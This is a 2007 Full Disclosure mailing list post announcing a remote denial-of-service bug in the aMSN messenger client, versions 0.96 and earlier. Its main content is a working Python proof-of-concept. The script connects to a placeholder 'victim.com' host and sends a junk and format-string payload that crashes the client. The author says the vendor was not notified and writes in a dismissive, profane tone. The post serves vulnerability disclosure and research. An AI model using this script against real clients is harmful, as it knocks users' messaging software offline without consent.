Full Disclosure mailing list archives

aMSN <= 0.96 remote DoS vulnerability


From: Levent Kayan <levent () corehack org>
Date: Sat, 21 Apr 2007 04:35:28 +0200

/*
 * bug: amsn remote DoS vulnerability
 * affected version: <= 0.96
 * site: http://amsn-project.net/
 * tested: amsn-0.96 on freebsd 6.2
 *
 * author: levent kayan
 * date: Tue Mar 27 16:04:51 CEST 2007
 * www.corehack.org
 */

/* Introduction */
amsn is a free open source MSN Messenger clone.

/* Technical details */
During fuzzing some instant-messaging applications, I found a basic bug in amsn.
I just sent some characters to that amsn port and noticed that it 
has reported an error and was killed. I didn't analyse the bug though. 
Maybe you're interested in doing so. :P
The following python script is enough to produce a DoS attack and kill 
the client:

---fuck off here---

import socket

HOST = 'victim.com'
PORT = 31337 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
   s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
          ?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
          %n%n%n%n%n%n\????#?[{#?]?#\`~??')

---fuck off here---

I think it were the character '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit. 

/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.

/* EOF */

-- 
Name: Levent Kayan
E-Mail: levent () corehack org
GPG key: 
0xd6794965
Key fingerprint:
FD20 03C3 DD7F 51BB 224F  F11E 0855 23C8 D679 4965
Website:
http://www.corehack.org/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: